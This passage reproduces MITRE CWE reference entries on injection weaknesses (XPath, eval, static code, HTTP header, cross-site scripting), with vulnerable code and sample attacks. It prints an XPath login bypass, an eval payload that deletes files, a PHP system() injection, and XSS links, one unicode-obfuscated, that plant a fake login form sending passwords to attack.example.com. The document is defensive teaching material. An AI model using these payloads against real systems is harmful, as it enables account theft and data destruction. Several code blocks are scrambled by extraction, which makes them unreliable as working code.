Wiley Hacker\r\nHTTP/1.1 200 OK\r\n
then the HTTP response would be split into two responses of the following form: (result)
HTTP/1.1 200 OK
... Set-Cookie: author=Wiley Hacker HTTP/1.1 200 OK ... The second response is completely controlled by the attacker and can be constructed with any header and body content desired. The ability to construct arbitrary HTTP responses permits a variety of resulting attacks, including:
Example 2 An attacker can make a single request to a vulnerable server that will cause the server to create two responses, the second of which may be misinterpreted as a response to a different request, possibly one made by another user sharing the same TCP connection with the server.
Cross-User Defacement can be accomplished by convincing the user to submit the malicious request themselves, or remotely in situations where the attacker and the user share a common TCP connection to the server, such as a shared proxy server.
Example 3 The impact of a maliciously constructed response can be magnified if it is cached, either by a web cache used by multiple users or even the browser cache of a single user.
Cache Poisoning: if a response is cached in a shared web cache, such as those commonly found in proxy servers, then all users of that cache will continue receive the malicious content until the cache entry is purged. Similarly, if the response is cached in the browser of an individual user, then that user will continue to receive the malicious content until the cache entry is purged, although the user of the local browser instance will be affected. Example 4 Once attackers have control of the responses sent by an application, they have a choice of a variety of malicious content to provide users.
Cross-Site Scripting: cross-site scripting is common form of attack where malicious JavaScript or other code included in a response is executed in the user's browser. The variety of attacks based on XSS is almost limitless, but they commonly include transmitting private data like cookies or other session information to the attacker, redirecting the victim to web content controlled by the attacker, or performing other malicious operations on the user's machine under the guise of the vulnerable site. The most common and dangerous attack vector against users of a vulnerable application uses JavaScript to transmit session and authentication information back to the attacker who can then take complete control of the victim's account. Example 5 In addition to using a vulnerable application to send malicious content to a user, the same weakness can also be leveraged to redirect sensitive content generated by the server to the attacker instead of the intended user.
Page Hijacking: by submitting a request that results in two responses, the intended response from the server and the response generated by the attacker, an attacker can cause an intermediate node, such as a shared proxy server, to misdirect a response generated by the server to the attacker instead of the intended user. Because the request made by the attacker generates two responses, the first is interpreted as a response to the attacker's request, while the second remains in limbo. When the user makes a legitimate request through the same TCP connection, the attacker's request is already waiting and is interpreted as a response to the victim's request. The attacker then sends a second request to the server, to which the proxy server responds with the server generated request intended for the victim, thereby compromising any sensitive information in the headers or body of the response intended for the victim. Note: this is a curated list of examples for users to understand the variety of ways in which this weakness can be introduced. It is not a complete list of all CVEs that are related to this CWE entry.
This MemberOf Relationships table shows additional CWE Categories and Views that
reference this weakness as a member. This information is often useful in understanding where a
weakness fits within the context of external information sources.
CWE-643: Improper Neutralization of Data within XPath Expressions ('XPath Injection')
View customized information:
For users who are interested in more notional aspects of a weakness. Example: educators, technical writers, and project/program managers.
For users who are concerned with the practical application and details about the nature of a weakness and how to prevent it from happening. Example: tool developers, security researchers, pen-testers, incident response analysts.
For users who are mapping an issue to CWE/CAPEC IDs, i.e., finding the most appropriate CWE for a specific issue (e.g., a CVE record). Example: tool developers, security researchers.
For users who wish to see all available information for the CWE/CAPEC entry.
For users who want to customize what details are displayed.
×
Edit Custom FilterThe product uses external input to dynamically construct an XPath expression used to retrieve data from an XML database, but it does not neutralize or incorrectly neutralizes that input. This allows an attacker to control the structure of the query.
The net effect is that the attacker will have control over the information selected from the XML database and may use that ability to control application flow, modify logic, retrieve unauthorized data, or bypass important checks (e.g. authentication).
This table specifies different individual consequences
associated with the weakness. The Scope identifies the application security area that is
violated, while the Impact describes the negative technical impact that arises if an
adversary succeeds in exploiting this weakness. The Likelihood provides information about
how likely the specific consequence is expected to be seen relative to the other
consequences in the list. For example, there may be high likelihood that a weakness will be
exploited to achieve a certain impact, but a low likelihood that it will be exploited to
achieve a different impact.
This table shows the weaknesses and high level categories that are related to this
weakness. These relationships are defined as ChildOf, ParentOf, MemberOf and give insight to
similar items that may exist at higher and lower levels of abstraction. In addition,
relationships such as PeerOf and CanAlsoBe are defined to show similar weaknesses that the user
may want to explore.
Relevant to the view "Research Concepts" (View-1000)
Relevant to the view "Architectural Concepts" (View-1008)
The different Modes of Introduction provide information
about how and when this
weakness may be introduced. The Phase identifies a point in the life cycle at which
introduction
may occur, while the Note provides a typical scenario related to introduction during the
given
phase.
This listing shows possible areas for which the given
weakness could appear. These
may be for specific named Languages, Operating Systems, Architectures, Paradigms,
Technologies,
or a class of such platforms. The platform is listed along with how frequently the given
weakness appears for that instance.
Example 1 Consider the following simple XML document that stores authentication information and a snippet of Java code that uses XPath query to retrieve authentication information: (informative)
Example Language: XML
<users>
<user> </users><login>john</login> </user><password>abracadabra</password> <home_dir>/home/john</home_dir> <user> <login>cbc</login> </user><password>1mgr8</password> <home_dir>/home/cbc</home_dir> The Java code used to retrieve the home directory based on the provided credentials is: (bad code)
Example Language: Java
XPath xpath = XPathFactory.newInstance().newXPath();
XPathExpression xlogin = xpath.compile("//users/user[login/text()='" + login.getUserName() + "' and password/text() = '" + login.getPassword() + "']/home_dir/text()"); Document d = DocumentBuilderFactory.newInstance().newDocumentBuilder().parse(new File("db.xml")); String homedir = xlogin.evaluate(d); Assume that user "john" wishes to leverage XPath Injection and login without a valid password. By providing a username "john" and password "' or ''='" the XPath expression now becomes (attack code)
//users/user[login/text()='john' or ''='' and password/text() = '' or ''='']/home_dir/text()
This lets user "john" login without a valid password, thus bypassing authentication.
This MemberOf Relationships table shows additional CWE Categories and Views that
reference this weakness as a member. This information is often useful in understanding where a
weakness fits within the context of external information sources.
Relationship
This weakness is similar to other weaknesses that enable injection style attacks, such as SQL injection, command injection and LDAP injection. The main difference is that the target of attack here is the XML database.
CWE-95: Improper Neutralization of Directives in Dynamically Evaluated Code ('Eval Injection')
View customized information:
For users who are interested in more notional aspects of a weakness. Example: educators, technical writers, and project/program managers.
For users who are concerned with the practical application and details about the nature of a weakness and how to prevent it from happening. Example: tool developers, security researchers, pen-testers, incident response analysts.
For users who are mapping an issue to CWE/CAPEC IDs, i.e., finding the most appropriate CWE for a specific issue (e.g., a CVE record). Example: tool developers, security researchers.
For users who wish to see all available information for the CWE/CAPEC entry.
For users who want to customize what details are displayed.
×
Edit Custom Filter This table specifies different individual consequences
associated with the weakness. The Scope identifies the application security area that is
violated, while the Impact describes the negative technical impact that arises if an
adversary succeeds in exploiting this weakness. The Likelihood provides information about
how likely the specific consequence is expected to be seen relative to the other
consequences in the list. For example, there may be high likelihood that a weakness will be
exploited to achieve a certain impact, but a low likelihood that it will be exploited to
achieve a different impact.
This table shows the weaknesses and high level categories that are related to this
weakness. These relationships are defined as ChildOf, ParentOf, MemberOf and give insight to
similar items that may exist at higher and lower levels of abstraction. In addition,
relationships such as PeerOf and CanAlsoBe are defined to show similar weaknesses that the user
may want to explore.
Relevant to the view "Research Concepts" (View-1000)
Relevant to the view "Architectural Concepts" (View-1008)
The different Modes of Introduction provide information
about how and when this
weakness may be introduced. The Phase identifies a point in the life cycle at which
introduction
may occur, while the Note provides a typical scenario related to introduction during the
given
phase.
This listing shows possible areas for which the given
weakness could appear. These
may be for specific named Languages, Operating Systems, Architectures, Paradigms,
Technologies,
or a class of such platforms. The platform is listed along with how frequently the given
weakness appears for that instance.
Example 1 edit-config.pl: This CGI script is used to modify settings in a configuration file. (bad code)
Example Language: Perl
use CGI qw(:standard);
sub config_file_add_key { my ($fname, $key, $arg) = @_;
# code to add a field/key to a file goes here sub config_file_set_key { my ($fname, $key, $arg) = @_;
# code to set key to a particular file goes here sub config_file_delete_key { my ($fname, $key, $arg) = @_;
# code to delete key from a particular file goes here sub handleConfigAction { my ($fname, $action) = @_;
my $key = param('key'); my $val = param('val'); # this is super-efficient code, especially if you have to invoke # any one of dozens of different functions! my $code = "config_file_$action_key(\$fname, \$key, \$val);"; eval($code); $configfile = "/home/cwe/config.txt"; print header; if (defined(param('action'))) { handleConfigAction($configfile, param('action')); }else { print "No action specified!\n"; }The script intends to take the 'action' parameter and invoke one of a variety of functions based on the value of that parameter - config_file_add_key(), config_file_set_key(), or config_file_delete_key(). It could set up a conditional to invoke each function separately, but eval() is a powerful way of doing the same thing in fewer lines of code, especially when a large number of functions or variables are involved. Unfortunately, in this case, the attacker can provide other values in the action parameter, such as: (attack code)
add_key(",","); system("/bin/ls");
This would produce the following string in handleConfigAction(): (result)
config_file_add_key(",","); system("/bin/ls");
Any arbitrary Perl code could be added after the attacker has "closed off" the construction of the original function call, in order to prevent parsing errors from causing the malicious eval() to fail before the attacker's payload is activated. This particular manipulation would fail after the system() call, because the "_key(\$fname, \$key, \$val)" portion of the string would cause an error, but this is irrelevant to the attack because the payload has already been activated. Example 2 This simple python3 script asks a user to supply a comma-separated list of numbers as input and adds them together. (bad code)
Example Language: Python
def main():
sum = 0
main()
try:
numbers = eval(input("Enter a comma-separated list of numbers: "))
except SyntaxError:
print("Error: invalid input")
for num in numbers:return
sum = sum + num
print(f"Sum of {numbers} = {sum}")
The eval() function can take the user-supplied list and convert it into a Python list object, therefore allowing the programmer to use list comprehension methods to work with the data. However, if code is supplied to the eval() function, it will execute that code. For example, a malicious user could supply the following string: (attack code)
__import__('subprocess').getoutput('rm -r *')
This would delete all the files in the current directory. For this reason, it is not recommended to use eval() with untrusted input. A way to accomplish this without the use of eval() is to apply an integer conversion on the input within a try/except block. If the user-supplied input is not numeric, this will raise a ValueError. By avoiding eval(), there is no opportunity for the input string to be executed as code. (good code)
Example Language: Python
def main():
sum = 0
main()
numbers = input("Enter a comma-separated list of numbers: ").split(",") try:
for num in numbers:
except ValueError:
sum = sum + int(num)
print(f"Sum of {numbers} = {sum}")
print("Error: invalid input")
An alternative, commonly-cited mitigation for this kind of weakness is to use the ast.literal_eval() function, since it is intentionally designed to avoid executing code. However, an adversary could still cause excessive memory or stack consumption via deeply nested structures [REF-1372], so the python documentation discourages use of ast.literal_eval() on untrusted data [REF-1373]. Note: this is a curated list of examples for users to understand the variety of ways in which this weakness can be introduced. It is not a complete list of all CVEs that are related to this CWE entry.
This MemberOf Relationships table shows additional CWE Categories and Views that
reference this weakness as a member. This information is often useful in understanding where a
weakness fits within the context of external information sources.
Other
Factors: special character errors can play a role in increasing the variety of code that can be injected, although some vulnerabilities do not require special characters at all, e.g. when a single function without arguments can be referenced and a terminator character is not necessary.
CWE-96: Improper Neutralization of Directives in Statically Saved Code ('Static Code Injection')
View customized information:
For users who are interested in more notional aspects of a weakness. Example: educators, technical writers, and project/program managers.
For users who are concerned with the practical application and details about the nature of a weakness and how to prevent it from happening. Example: tool developers, security researchers, pen-testers, incident response analysts.
For users who are mapping an issue to CWE/CAPEC IDs, i.e., finding the most appropriate CWE for a specific issue (e.g., a CVE record). Example: tool developers, security researchers.
For users who wish to see all available information for the CWE/CAPEC entry.
For users who want to customize what details are displayed.
×
Edit Custom FilterThe product receives input from an upstream component, but it does not neutralize or incorrectly neutralizes code syntax before inserting the input into an executable resource, such as a library, configuration file, or template.
This table specifies different individual consequences
associated with the weakness. The Scope identifies the application security area that is
violated, while the Impact describes the negative technical impact that arises if an
adversary succeeds in exploiting this weakness. The Likelihood provides information about
how likely the specific consequence is expected to be seen relative to the other
consequences in the list. For example, there may be high likelihood that a weakness will be
exploited to achieve a certain impact, but a low likelihood that it will be exploited to
achieve a different impact.
This table shows the weaknesses and high level categories that are related to this
weakness. These relationships are defined as ChildOf, ParentOf, MemberOf and give insight to
similar items that may exist at higher and lower levels of abstraction. In addition,
relationships such as PeerOf and CanAlsoBe are defined to show similar weaknesses that the user
may want to explore.
Relevant to the view "Research Concepts" (View-1000)
Relevant to the view "Architectural Concepts" (View-1008)
The different Modes of Introduction provide information
about how and when this
weakness may be introduced. The Phase identifies a point in the life cycle at which
introduction
may occur, while the Note provides a typical scenario related to introduction during the
given
phase.
This listing shows possible areas for which the given
weakness could appear. These
may be for specific named Languages, Operating Systems, Architectures, Paradigms,
Technologies,
or a class of such platforms. The platform is listed along with how frequently the given
weakness appears for that instance.
Example 1 This example attempts to write user messages to a message file and allow users to view them. (bad code)
Example Language: PHP
$MessageFile = "messages.out";
if ($_GET["action"] == "NewMessage") { $name = $_GET["name"]; }$message = $_GET["message"]; $handle = fopen($MessageFile, "a+"); fwrite($handle, "<b>$name</b> says '$message'<hr>\n"); fclose($handle); echo "Message Saved!<p>\n"; else if ($_GET["action"] == "ViewMessages") { include($MessageFile); }While the programmer intends for the MessageFile to only include data, an attacker can provide a message such as: (attack code)
name=h4x0r
message=%3C?php%20system(%22/bin/ls%20-l%22);?%3E which will decode to the following: (attack code)
<?php system("/bin/ls -l");?>
The programmer thought they were just including the contents of a regular data file, but PHP parsed it and executed the code. Now, this code is executed any time people view messages. Notice that XSS (CWE-79) is also possible in this situation. Note: this is a curated list of examples for users to understand the variety of ways in which this weakness can be introduced. It is not a complete list of all CVEs that are related to this CWE entry.
This MemberOf Relationships table shows additional CWE Categories and Views that
reference this weakness as a member. This information is often useful in understanding where a
weakness fits within the context of external information sources.
Relationship
"HTML injection" (see CWE-79: XSS) could be thought of as an example of this, but the code is injected and executed on the client side, not the server side. Server-Side Includes (SSI) are an example of direct static code injection.
CWE-76: Improper Neutralization of Equivalent Special Elements
View customized information:
For users who are interested in more notional aspects of a weakness. Example: educators, technical writers, and project/program managers.
For users who are concerned with the practical application and details about the nature of a weakness and how to prevent it from happening. Example: tool developers, security researchers, pen-testers, incident response analysts.
For users who are mapping an issue to CWE/CAPEC IDs, i.e., finding the most appropriate CWE for a specific issue (e.g., a CVE record). Example: tool developers, security researchers.
For users who wish to see all available information for the CWE/CAPEC entry.
For users who want to customize what details are displayed.
×
Edit Custom FilterThe product correctly neutralizes certain special elements, but it improperly neutralizes equivalent special elements.
The product may have a fixed list of special characters it believes is complete. However, there may be alternate encodings, or representations that also have the same meaning. For example, the product may filter out a leading slash (/) to prevent absolute path names, but does not account for a tilde (~) followed by a user name, which on some *nix systems could be expanded to an absolute pathname. Alternately, the product might filter a dangerous "-e" command-line switch when calling an external program, but it might not account for "--exec" or other switches that have the same semantics.
This table specifies different individual consequences
associated with the weakness. The Scope identifies the application security area that is
violated, while the Impact describes the negative technical impact that arises if an
adversary succeeds in exploiting this weakness. The Likelihood provides information about
how likely the specific consequence is expected to be seen relative to the other
consequences in the list. For example, there may be high likelihood that a weakness will be
exploited to achieve a certain impact, but a low likelihood that it will be exploited to
achieve a different impact.
This table shows the weaknesses and high level categories that are related to this
weakness. These relationships are defined as ChildOf, ParentOf, MemberOf and give insight to
similar items that may exist at higher and lower levels of abstraction. In addition,
relationships such as PeerOf and CanAlsoBe are defined to show similar weaknesses that the user
may want to explore.
Relevant to the view "Research Concepts" (View-1000)
Relevant to the view "Software Development" (View-699)
Relevant to the view "Architectural Concepts" (View-1008)
The different Modes of Introduction provide information
about how and when this
weakness may be introduced. The Phase identifies a point in the life cycle at which
introduction
may occur, while the Note provides a typical scenario related to introduction during the
given
phase.
This listing shows possible areas for which the given
weakness could appear. These
may be for specific named Languages, Operating Systems, Architectures, Paradigms,
Technologies,
or a class of such platforms. The platform is listed along with how frequently the given
weakness appears for that instance.
This MemberOf Relationships table shows additional CWE Categories and Views that
reference this weakness as a member. This information is often useful in understanding where a
weakness fits within the context of external information sources.
CWE-644: Improper Neutralization of HTTP Headers for Scripting Syntax
View customized information:
For users who are interested in more notional aspects of a weakness. Example: educators, technical writers, and project/program managers.
For users who are concerned with the practical application and details about the nature of a weakness and how to prevent it from happening. Example: tool developers, security researchers, pen-testers, incident response analysts.
For users who are mapping an issue to CWE/CAPEC IDs, i.e., finding the most appropriate CWE for a specific issue (e.g., a CVE record). Example: tool developers, security researchers.
For users who wish to see all available information for the CWE/CAPEC entry.
For users who want to customize what details are displayed.
×
Edit Custom FilterThe product does not neutralize or incorrectly neutralizes web scripting syntax in HTTP headers that can be used by web browser components that can process raw headers, such as Flash.
An attacker may be able to conduct cross-site scripting and other attacks against users who have these components enabled. If a product does not neutralize user controlled data being placed in the header of an HTTP response coming from the server, the header may contain a script that will get executed in the client's browser context, potentially resulting in a cross site scripting vulnerability or possibly an HTTP response splitting attack. It is important to carefully control data that is being placed both in HTTP response header and in the HTTP response body to ensure that no scripting syntax is present, taking various encodings into account. This table specifies different individual consequences
associated with the weakness. The Scope identifies the application security area that is
violated, while the Impact describes the negative technical impact that arises if an
adversary succeeds in exploiting this weakness. The Likelihood provides information about
how likely the specific consequence is expected to be seen relative to the other
consequences in the list. For example, there may be high likelihood that a weakness will be
exploited to achieve a certain impact, but a low likelihood that it will be exploited to
achieve a different impact.
This table shows the weaknesses and high level categories that are related to this
weakness. These relationships are defined as ChildOf, ParentOf, MemberOf and give insight to
similar items that may exist at higher and lower levels of abstraction. In addition,
relationships such as PeerOf and CanAlsoBe are defined to show similar weaknesses that the user
may want to explore.
Relevant to the view "Research Concepts" (View-1000)
The different Modes of Introduction provide information
about how and when this
weakness may be introduced. The Phase identifies a point in the life cycle at which
introduction
may occur, while the Note provides a typical scenario related to introduction during the
given
phase.
This listing shows possible areas for which the given
weakness could appear. These
may be for specific named Languages, Operating Systems, Architectures, Paradigms,
Technologies,
or a class of such platforms. The platform is listed along with how frequently the given
weakness appears for that instance.
Example 1 In the following Java example, user-controlled data is added to the HTTP headers and returned to the client. Given that the data is not subject to neutralization, a malicious user may be able to inject dangerous scripting tags that will lead to script execution in the client browser. (bad code)
Example Language: Java
response.addHeader(HEADER_NAME, untrustedRawInputData);
Note: this is a curated list of examples for users to understand the variety of ways in which this weakness can be introduced. It is not a complete list of all CVEs that are related to this CWE entry.
This MemberOf Relationships table shows additional CWE Categories and Views that
reference this weakness as a member. This information is often useful in understanding where a
weakness fits within the context of external information sources.
CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
View customized information:
For users who are interested in more notional aspects of a weakness. Example: educators, technical writers, and project/program managers.
For users who are concerned with the practical application and details about the nature of a weakness and how to prevent it from happening. Example: tool developers, security researchers, pen-testers, incident response analysts.
For users who are mapping an issue to CWE/CAPEC IDs, i.e., finding the most appropriate CWE for a specific issue (e.g., a CVE record). Example: tool developers, security researchers.
For users who wish to see all available information for the CWE/CAPEC entry.
For users who want to customize what details are displayed.
×
Edit Custom FilterThere are many variants of cross-site scripting, characterized by a variety of terms or involving different attack topologies. However, they all indicate the same fundamental weakness: improper neutralization of dangerous input between the adversary and a victim.
This table specifies different individual consequences
associated with the weakness. The Scope identifies the application security area that is
violated, while the Impact describes the negative technical impact that arises if an
adversary succeeds in exploiting this weakness. The Likelihood provides information about
how likely the specific consequence is expected to be seen relative to the other
consequences in the list. For example, there may be high likelihood that a weakness will be
exploited to achieve a certain impact, but a low likelihood that it will be exploited to
achieve a different impact.
This table shows the weaknesses and high level categories that are related to this
weakness. These relationships are defined as ChildOf, ParentOf, MemberOf and give insight to
similar items that may exist at higher and lower levels of abstraction. In addition,
relationships such as PeerOf and CanAlsoBe are defined to show similar weaknesses that the user
may want to explore.
Relevant to the view "Research Concepts" (View-1000)
Relevant to the view "Software Development" (View-699)
Relevant to the view "Weaknesses for Simplified Mapping of Published Vulnerabilities" (View-1003)
Relevant to the view "Architectural Concepts" (View-1008)
The different Modes of Introduction provide information
about how and when this
weakness may be introduced. The Phase identifies a point in the life cycle at which
introduction
may occur, while the Note provides a typical scenario related to introduction during the
given
phase.
This listing shows possible areas for which the given
weakness could appear. These
may be for specific named Languages, Operating Systems, Architectures, Paradigms,
Technologies,
or a class of such platforms. The platform is listed along with how frequently the given
weakness appears for that instance.
Example 1 The following code displays a welcome message on a web page based on the HTTP GET username parameter (covers a Reflected XSS (Type 1) scenario). (bad code)
Example Language: PHP
$username = $_GET['username'];
echo '<div class="header"> Welcome, ' . $username . '</div>'; Because the parameter can be arbitrary, the url of the page could be modified so $username contains scripting syntax, such as (attack code)
http://trustedSite.example.com/welcome.php?username=<Script Language="Javascript">alert("You've been attacked!");</Script>
This results in a harmless alert dialog popping up. Initially this might not appear to be much of a vulnerability. After all, why would someone enter a URL that causes malicious code to run on their own computer? The real danger is that an attacker will create the malicious URL, then use e-mail or social engineering tricks to lure victims into visiting a link to the URL. When victims click the link, they unwittingly reflect the malicious content through the vulnerable web application back to their own computers. More realistically, the attacker can embed a fake login box on the page, tricking the user into sending the user's password to the attacker: (attack code)
http://trustedSite.example.com/welcome.php?username=<div id="stealPassword">Please Login:<form name="input" action="http://attack.example.com/stealPassword.php" method="post">Username: <input type="text" name="username" /><br/>Password: <input type="password" name="password" /><br/><input type="submit" value="Login" /></form></div>
If a user clicks on this link then Welcome.php will generate the following HTML and send it to the user's browser: (result)
<div class="header"> Welcome, <div id="stealPassword"> Please Login:
<form name="input" action="attack.example.com/stealPassword.php" method="post"> Username: <input type="text" name="username" /><br/> </form>Password: <input type="password" name="password" /><br/> <input type="submit" value="Login" /> </div></div> The trustworthy domain of the URL may falsely assure the user that it is OK to follow the link. However, an astute user may notice the suspicious text appended to the URL. An attacker may further obfuscate the URL (the following example links are broken into multiple lines for readability): (attack code)
trustedSite.example.com/welcome.php?username=%3Cdiv+id%3D%22
stealPassword%22%3EPlease+Login%3A%3Cform+name%3D%22input %22+action%3D%22http%3A%2F%2Fattack.example.com%2FstealPassword.php %22+method%3D%22post%22%3EUsername%3A+%3Cinput+type%3D%22text %22+name%3D%22username%22+%2F%3E%3Cbr%2F%3EPassword%3A +%3Cinput+type%3D%22password%22+name%3D%22password%22 +%2F%3E%3Cinput+type%3D%22submit%22+value%3D%22Login%22 +%2F%3E%3C%2Fform%3E%3C%2Fdiv%3E%0D%0A The same attack string could also be obfuscated as: (attack code)
trustedSite.example.com/welcome.php?username=<script+type="text/javascript">
document.write('\u003C\u0064\u0069\u0076\u0020\u0069\u0064\u003D\u0022\u0073 \u0074\u0065\u0061\u006C\u0050\u0061\u0073\u0073\u0077\u006F\u0072\u0064 \u0022\u003E\u0050\u006C\u0065\u0061\u0073\u0065\u0020\u004C\u006F\u0067 \u0069\u006E\u003A\u003C\u0066\u006F\u0072\u006D\u0020\u006E\u0061\u006D \u0065\u003D\u0022\u0069\u006E\u0070\u0075\u0074\u0022\u0020\u0061\u0063 \u0074\u0069\u006F\u006E\u003D\u0022\u0068\u0074\u0074\u0070\u003A\u002F \u002F\u0061\u0074\u0074\u0061\u0063\u006B\u002E\u0065\u0078\u0061\u006D \u0070\u006C\u0065\u002E\u0063\u006F\u006D\u002F\u0073\u0074\u0065\u0061 \u006C\u0050\u0061\u0073\u0073\u0077\u006F\u0072\u0064\u002E\u0070\u0068 \u0070\u0022\u0020\u006D\u0065\u0074\u0068\u006F\u0064\u003D\u0022\u0070 \u006F\u0073\u0074\u0022\u003E\u0055\u0073\u0065\u0072\u006E\u0061\u006D \u0065\u003A\u0020\u003C\u0069\u006E\u0070\u0075\u0074\u0020\u0074\u0079 \u0070\u0065\u003D\u0022\u0074\u0065\u0078\u0074\u0022\u0020\u006E\u0061 \u006D\u0065\u003D\u0022\u0075\u0073\u0065\u0072\u006E\u0061\u006D\u0065 \u0022\u0020\u002F\u003E\u003C\u0062\u0072\u002F\u003E\u0050\u0061\u0073 \u0073\u0077\u006F\u0072\u0064\u003A\u0020\u003C\u0069\u006E\u0070\u0075 \u0074\u0020\u0074\u0079\u0070\u0065\u003D\u0022\u0070\u0061\u0073\u0073 \u0077\u006F\u0072\u0064\u0022\u0020\u006E\u0061\u006D\u0065\u003D\u0022 \u0070\u0061\u0073\u0073\u0077\u006F\u0072\u0064\u0022\u0020\u002F\u003E \u003C\u0069\u006E\u0070\u0075\u0074\u0020\u0074\u0079\u0070\u0065\u003D \u0022\u0073\u0075\u0062\u006D\u0069\u0074\u0022\u0020\u0076\u0061\u006C \u0075\u0065\u003D\u0022\u004C\u006F\u0067\u0069\u006E\u0022\u0020\u002F \u003E\u003C\u002F\u0066\u006F\u0072\u006D\u003E\u003C\u002F\u0064\u0069\u0076\u003E\u000D');</script> Both of these attack links will result in the fake login box appearing on the page, and users are more likely to ignore indecipherable text at the end of URLs. Example 2 The following code displays a Reflected XSS (Type 1) scenario. The following JSP code segment reads an employee ID, eid, from an HTTP request and displays it to the user. (bad code)
Example Language: JSP
<% String eid = request.getParameter("eid"); %>
... Employee ID: <%= eid %> The following ASP.NET code segment reads an employee ID number from an HTTP request and displays it to the user. (bad code)
Example Language: ASP.NET
<%
protected System.Web.UI.WebControls.TextBox Login; protected System.Web.UI.WebControls.Label EmployeeID; ... EmployeeID.Text = Login.Text; %> <p><asp:label id="EmployeeID" runat="server" /></p> The code in this example operates correctly if the Employee ID variable contains only standard alphanumeric text. If it has a value that includes meta-characters or source code, then the code will be executed by the web browser as it displays the HTTP response. Example 3 The following code displays a Stored XSS (Type 2) scenario. The following JSP code segment queries a database for an employee with a given ID and prints the corresponding employee's name. (bad code)
Example Language: JSP
<%Statement stmt = conn.createStatement();
ResultSet rs = stmt.executeQuery("select * from emp where id="+eid); if (rs != null) { rs.next(); }%>String name = rs.getString("name"); Employee Name: <%= name %> The following ASP.NET code segment queries a database for an employee with a given employee ID and prints the name corresponding with the ID. (bad code)
Example Language: ASP.NET
<%
protected System.Web.UI.WebControls.Label EmployeeName; ... string query = "select * from emp where id=" + eid; sda = new SqlDataAdapter(query, conn); sda.Fill(dt); string name = dt.Rows[0]["Name"]; ... EmployeeName.Text = name;%> <p><asp:label id="EmployeeName" runat="server" /></p> This code can appear less dangerous because the value of name is read from a database, whose contents are apparently managed by the application. However, if the value of name originates from user-supplied data, then the database can be a conduit for malicious content. Without proper input validation on all data stored in the database, an attacker can execute malicious commands in the user's web browser. Example 4 The following code consists of two separate pages in a web application, one devoted to creating user accounts and another devoted to listing active users currently logged in. It also displays a Stored XSS (Type 2) scenario. CreateUser.php (bad code)
Example Language: PHP
$username = mysql_real_escape_string($username);
$fullName = mysql_real_escape_string($fullName); $query = sprintf('Insert Into users (username,password) Values ("%s","%s","%s")', $username, crypt($password),$fullName) ; mysql_query($query); /.../ The code is careful to avoid a SQL injection attack (CWE-89) but does not stop valid HTML from being stored in the database. This can be exploited later when ListUsers.php retrieves the information: ListUsers.php (bad code)
Example Language: PHP
$query = 'Select * From users Where loggedIn=true';
$results = mysql_query($query); if (!$results) { exit; }//Print list of users to page echo '<div id="userlist">Currently Active Users:'; while ($row = mysql_fetch_assoc($results)) { echo '<div class="userNames">'.$row['fullname'].'</div>'; }echo '</div>'; The attacker can set their name to be arbitrary HTML, which will then be displayed to all visitors of the Active Users page. This HTML can, for example, be a password stealing Login message. Example 5 The following code is a simplistic message board that saves messages in HTML format and appends them to a file. When a new user arrives in the room, it makes an announcement: (bad code)
Example Language: PHP
$name = $_COOKIE["myname"];
$announceStr = "$name just logged in."; //save HTML-formatted message to file; implementation details are irrelevant for this example. saveMessage($announceStr); An attacker may be able to perform an HTML injection (Type 2 XSS) attack by setting a cookie to a value like: (attack code)
<script>document.alert('Hacked');</script>
The raw contents of the message file would look like: (result)
<script>document.alert('Hacked');</script> has logged in.
For each person who visits the message page, their browser would execute the script, generating a pop-up window that says "Hacked". More malicious attacks are possible; see the rest of this entry. Example 6 The following code attempts to stop XSS attacks by removing all occurences of "script" in an input string. (bad code)
Example Language: Java
public String removeScriptTags(String input, String mask) {
return input.replaceAll("script", mask); }Because the code only checks for the lower-case "script" string, it can be easily defeated with upper-case script tags. Note: this is a curated list of examples for users to understand the variety of ways in which this weakness can be introduced. It is not a complete list of all CVEs that are related to this CWE entry.
This MemberOf Relationships table shows additional CWE Categories and Views that
reference this weakness as a member. This information is often useful in understanding where a
weakness fits within the context of external information sources.
Relationship There can be a close relationship between XSS and CSRF (CWE-352). An attacker might use CSRF in order to trick the victim into submitting requests to the server in which the requests contain an XSS payload. A well-known example of this was the Samy worm on MySpace [REF-956]. The worm used XSS to insert malicious HTML sequences into a user's profile and add the attacker as a MySpace friend. MySpace friends of that victim would then execute the payload to modify their own profiles, causing the worm to propagate exponentially. Since the victims did not intentionally insert the malicious script themselves, CSRF was a root cause. Applicable Platform XSS flaws are very common in web applications, since they require a great deal of developer discipline to avoid them. Other The attack methods for XSS can vary depending on the type of XSS and the attacker's goal. Reflected XSS exploits (Type 1) occur when an attacker causes a victim to supply dangerous content to a vulnerable web application, which is then reflected back to the victim and executed by the web browser. The most common mechanism for delivering malicious content is to include it as a parameter in a URL that is posted publicly or e-mailed directly to the victim. URLs constructed in this manner constitute the core of many phishing schemes, whereby an attacker convinces a victim to visit a URL that refers to a vulnerable site. After the site reflects the attacker's content back to the victim, the content is executed by the victim's browser. In a Stored XSS exploit (Type 2), the optimal place to inject malicious content is in an area that is displayed to either many users or particularly interesting users. Interesting users typically have elevated privileges in the application or interact with sensitive data that is valuable to the attacker. If one of these users executes malicious content, the attacker may be able to perform privileged operations on behalf of the user or gain access to sensitive data belonging to the user. For example, the attacker might inject XSS into a log message, which might not be handled properly when an administrator views the logs. DOM-based XSS (Type 0) generally involves server-controlled, trusted script that is sent to the client, such as JavaScript that performs sanity checks on a form before the user submits it. If the server-supplied script processes user-supplied data and then injects it back into the web page (such as with dynamic HTML), then DOM-based XSS is possible. Other Attackers frequently use a variety of methods to encode the malicious portion of the attack, such as URL encoding or Unicode, so the request looks less suspicious. Phishing attacks could be used to emulate trusted web sites and trick the victim into entering a password, allowing the attacker to compromise the victim's account on that web site. Other Cross-site scripting (XSS) vulnerabilities occur when:
CWE-86: Improper Neutralization of Invalid Characters in Identifiers in Web Pages
View customized information:
For users who are interested in more notional aspects of a weakness. Example: educators, technical writers, and project/program managers.
For users who are concerned with the practical application and details about the nature of a weakness and how to prevent it from happening. Example: tool developers, security researchers, pen-testers, incident response analysts.
For users who are mapping an issue to CWE/CAPEC IDs, i.e., finding the most appropriate CWE for a specific issue (e.g., a CVE record). Example: tool developers, security researchers.
For users who wish to see all available information for the CWE/CAPEC entry.
For users who want to customize what details are displayed.
×
Edit Custom FilterThe product does not neutralize or incorrectly neutralizes invalid characters or byte sequences in the middle of tag names, URI schemes, and other identifiers.
Some web browsers may remove these sequences, resulting in output that may have unintended control implications. For example, the product may attempt to remove a "javascript:" URI scheme, but a "java%00script:" URI may bypass this check and still be rendered as active javascript by some browsers, allowing XSS or other attacks.
